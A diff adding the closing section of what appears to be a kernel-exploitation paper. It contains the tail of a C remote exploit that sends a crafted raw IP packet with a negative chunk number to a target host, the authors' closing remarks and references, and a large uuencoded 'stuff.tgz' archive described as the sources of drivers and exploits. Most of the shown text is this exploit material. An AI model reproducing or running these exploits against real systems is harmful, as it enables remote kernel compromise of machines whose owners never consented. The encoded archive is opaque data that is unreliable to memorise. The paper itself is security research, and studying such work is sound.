+        ip->daddr = inet_addr(argv[1]);
+        twsk->chunk_num = NEGATIVE_CHUNK_NUM;
+        ip->check = csum((unsigned short *) buffer, TWSK_PACKET_LEN);
+
+        if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, val, sizeof(one)) < 0)
+          fatal_perror("setsockopt");
+
+        if (sendto(sock, buffer, ip->tot_len, 0, (struct sockaddr *) &sin,
+sizeof(sin)) < 0)
+          fatal_perror("sendto");
+
+        return 0;
+}
+
+< / >
+
+ 
+------[ 4 - Final words 
+
+
+With the remote exploiting discussion ends that paper. We have presented
+different scenarios and different exploiting tecniques and 'notes' that we
+hope you'll find somehow useful. This paper was a sort of sum up of the
+more general approaches we took in those years of 'kernel exploiting'. 
+
+As we said at the start of the paper, the kernel is a big and large beast,
+which offers many different points of 'attack' and which has more severe
+constraints than the userland exploiting. It is also 'relative new' and
+improvements (and new logical or not bugs) are getting out. 
+At the same time new countermeasures come out to make our 'exploiting
+life' harder and harder. 
+
+The first draft of this paper was done some months ago, so we apologies if
+some of the information here present could be outdated (or already
+presented somewhere else and not properly referenced). We've tried to add
+a couple of comments around the text to point out the most important
+recent changes.  
+
+So, this is the end, time remains just for some greets. Thank you for
+reading so far, we hope you enjoyed the whole work. 
+
+A last minute shotout goes to bitsec guys, who performed a cool talk 
+about kernel exploiting at BlackHat conference [24]. Go check their
+paper/exploits for examples and covering of *BSD and Windows systems.
+
+Greetz and thanks go, in random order, to :  
+
+sgrakkyu: darklady(:*), HTB, risk (Arxlab), recidjvo (for netfilter
+tricks), vecna (for being vecna:)).
+
+twiz: lmbdwr, ga, sd, karl, cmn, christer, koba, smaster, #dnerds & 
+#elfdev people for discussions, corrections, feedbacks and just long
+'evening/late night' talks.
+A last shotout to akira, sanka, metal_militia and yhly for making the
+monday evening a _great_ evening [and for all the beers offered :-) ]. 
+
+
+------[ 5 - References
+
+
+[1] - Intel Architecture Reference Manuals
+      http://www.intel.com/products/processor/manuals/index.htm
+
+[2] - SPARC V9 Architecture 
+      http://www.sparc.com/standards/SPARCV9.pdf
+
+[3] - AMD64 Reference Manuals
+      http://www.amd.com/it-it/Processors/
+      ProductInformation/0,,30_118_4699_875^7044,00.html
+
+[4] - MCAST_MSFILTER iSEC's advisory  
+      http://www.isec.pl/vulnerabilities/isec-0015-msfilter.txt
+
+[5] - sendmsg local buffer overflow
+      http://www.securityfocus.com/bid/14785
+
+[6] - kad, "Handling Interrupt Descriptor Table for fun and profit"
+      http://www.phrack.org/archives/59/p59-0x04.txt 
+
+[7] - iSEC Security Research
+      http://www.isec.pl
+
+[8] - Jeff Bonwick, "The Slab Allocator: An Object-Caching Kernel Memory
+      Allocator"
+      http://www.usenix.org/publications/library/proceedings/
+      bos94/bonwick.html
+
+[9] - Daniel P. Bovet & Marco Cesati
+      "Understanding the Linux Kernel", 3rd Edition [ISBN 0-596-00565-2]
+
+[10] - Richard McDougall and Jim Mauro
+       "Solaris Internals" , 2nd Edition [ISBN 0-13-148209-2]
+
+[11] - Mel Gorman, "Linux VM Documentation" 
+       http://www.skynet.ie/~mel/projects/vm/
+
+[12] - sd, krad exploit for sys_epoll vulnerability
+       http://www.securiteam.com/exploits/5VP0N0UF5U.html
+
+[13] - noir, "Smashing The Kernel Stack For Fun And Profit" 
+       http://www.phrack.org/archives/60/p60-0x06.txt
+
+[14] - UltraSPARC User's Manuals 
+       http://www.sun.com/processors/documentation.html
+
+[15] - pr1, "Exploiting SPARC Buffer Overflow vulnerabilities"
+       http://www.emsi.it.pl/sploits/solaris/sparcoverflow.html
+
+[16] - horizon, Defeating Solaris/SPARC Non-Executable Stack Protection
+       http://www.emsi.it.pl/sploits/solaris/horizon.html
+
+[17] - Gavin Maltby's Sun Weblog, "SPARC System Calls" 
+       http://blogs.sun.com/gavinm/entry/sparc_system_calls
+
+[18] - PaX project 
+       http://pax.grsecurity.net 	    
+
+[19] - Solar Designer, "Getting around non-executable stack (and fix)" 
+       http://insecure.org/sploits/linux.libc.return.lpr.sploit.html
+
+[20] - Sebastian Krahmer, "x86-64 buffer overflow exploits and the
+       borrowed code chunks exploitation technique"
+       http://www.suse.de/~krahmer/no-nx.pdf 
+
+[21] - Laurent BUTTI, Jerome RAZNIEWSKI & Julien TINNES
+       "Madwifi SIOCGIWSCAN buffer overflow"
+       http://lists.grok.org.uk/pipermail/full-disclosure/2006-December
+       /051176.html
+
+[22] - sgrakkyu, "madwifi linux remote kernel exploit"
+       http://www.milw0rm.com/exploits/3389
+
+[23] - sd & devik, "Linux on-the-fly kernel patching without LKM" 
+       http://www.phrack.org/archives/58/p58-0x07
+
+[24] - Joel Eriksson, Karl Janmar & Christer berg, "Kernel Wars"
+       https://www.blackhat.com/presentations/bh-eu-07/Eriksson-Janmar
+       /Whitepaper/bh-eu-07-eriksson-WP.pdf
+
+
+------[ 6 - Sources - drivers and exploits [stuff.tgz]
+
+
+begin 644 stuff.tgz
+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
